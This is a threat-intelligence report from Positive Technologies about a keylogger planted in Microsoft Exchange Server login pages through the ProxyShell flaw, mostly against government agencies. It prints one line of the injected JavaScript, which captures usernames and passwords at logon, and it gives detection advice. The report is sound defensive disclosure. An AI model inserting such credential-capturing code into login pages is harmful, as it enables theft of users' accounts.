Positive Technologies detects a series of attacks via Microsoft Exchange Server

While responding to an incident, the Incident Response team of Positive Technologies Expert Security Center (PT ESC) discovered an unknown keylogger embedded in the main Microsoft Exchange Server page of one of our customers. This keylogger was collecting account credentials into a file accessible via a special path from the internet. The team identified over 30 victims, most of whom were linked to government agencies across various countries. According to our data, the first compromise occurred in 2021. Without additional data, we can't attribute these attacks to a specific group; however, most victims are located in Africa and the Middle East.

Attack scenario

To inject the stealer, hackers exploited ProxyShell, a known Microsoft Exchange Server vulnerability. Next, they added the keylogger code to the server main page.

This is the code that hackers embed in the Microsoft Exchange Server main page, in particular, into the clkLgn() function:

    
var ObjectData = "ObjectType=" + escape(curTime + "\t" + gbid("username").value + "\t" + gbid("password").value) + "&uin=" + Math.random().toString(16).substring(2);

Here's how it looks on the main page:

Code of the compromised Microsoft Exchange server main page
Figure 1. Code of the compromised Microsoft Exchange server main page

Also, in the logon.aspx file, the hackers added a code that processes the result of the stealer's work and redirects account credentials to a file accessible from the internet.

Code of the compromised logon.aspx file
Figure 2. Code of the compromised logon.aspx file

As a result of the code execution demonstrated in Figure 2, the attackers gained access to the following user credentials:

Stolen credentials
Figure 3. Stolen credentials

Victims

We have identified over 30 victims, predominantly government agencies from various countries. The list of victims also includes banks, IT companies, and educational institutions. The countries affected by these attacks include Russia, the UAE, Kuwait, Oman, Niger, Nigeria, Ethiopia, Mauritius, Jordan, and Lebanon. All victims have been notified of the breach.

Recommendations

You can check for potential compromise by searching for the stealer code on the main page of your Microsoft Exchange server (see Figure 1). If your server has been compromised, identify the account data that has been stolen and delete the file where this data is stored by hackers. You can find the path to this file in the logon.aspx file (see Figure 2). Make sure you are using the latest version of Microsoft Exchange Server, or install pending updates.

If necessary, PT Expert Security Center specialists are ready to assist you with the investigation.

Share this article:

Get in touch

Fill in the form and our specialists
will contact you shortly